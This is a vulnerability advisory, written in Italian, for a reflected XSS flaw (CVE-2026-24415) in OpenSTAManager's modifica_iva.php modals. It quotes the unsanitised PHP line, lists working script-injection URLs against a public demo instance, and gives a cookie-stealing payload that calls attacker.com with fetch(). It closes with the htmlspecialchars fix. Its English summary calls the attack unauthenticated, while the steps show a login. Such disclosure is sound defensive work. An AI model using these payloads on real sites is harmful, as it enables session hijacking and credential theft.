
CVE-2026-24415 - OpenSTAManager affetto da XSS in modifica_iva.php tramite il parametro righe
| Campo | Dettagli |
|---|---|
| ID CVE | CVE-2026-24415 |
| Gravità | MEDIA |
| Advisory | Visualizza Advisory |
| Scoperto da | Lukasz Rybak |
Multiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users' browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.
Parametro Vulnerabile: righe (GET)
OpenSTAManager v2.9.8 contiene multiple vulnerabilità Reflected XSS nei modali di modifica di fatture/ordini/contratti. L'applicazione non sanitizza correttamente l'input fornito dall'utente tramite il parametro GET righe prima di rifletterlo nell'output HTML.
Posizione del Codice Vulnerabile:
File: /modules/contratti/modals/modifica_iva.php (Riga 125)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
Il parametro $_GET['righe'] viene stampato direttamente nell'attributo HTML value senza alcuna sanitizzazione tramite htmlspecialchars() o funzioni equivalenti. Ciò consente a un attaccante di fuoriuscire dal contesto dell'attributo e iniettare HTML/JavaScript arbitrario.
Tutti i File Interessati:
/modules/contratti/modals/modifica_iva.php - Riga 125, Riga 167/modules/preventivi/modals/modifica_iva.php - Riga 125, Riga 167/modules/fatture/modals/modifica_iva.php - Riga 121, Riga 161/modules/ddt/modals/modifica_iva.php - Riga 125, Riga 167/modules/ordini/modals/modifica_iva.php - Riga 125, Riga 167/modules/interventi/modals/modifica_iva.php - Riga 125, Riga 167Prerequisiti:
Passo 1: Login
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
Passo 2: Attivare la XSS Navigare al seguente URL in un browser (oppure usare curl con i cookies):
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
URL Testati (Tutti vulnerabili):
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>Risultato Atteso: Popup di avviso JavaScript che mostra il cookie di sessione corrente, confermando l'esecuzione del codice.
Output HTML (verificato su istanza live):
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
Verifica:
Payload Alternativi:
Furto di sessione: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>
Utenti Interessati: Tutti gli utenti autenticati con accesso ai moduli contratti, fatture, preventivi o ordini.
Scenario di Attacco:
Correzione Raccomandata:
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
Applicare questa correzione a tutti i file interessati elencati nella sezione Dettagli.
Questo CVE è stato divulgato in modo responsabile seguendo le pratiche di divulgazione coordinata delle vulnerabilità. Le informazioni qui fornite sono esclusivamente a scopo educativo e difensivo.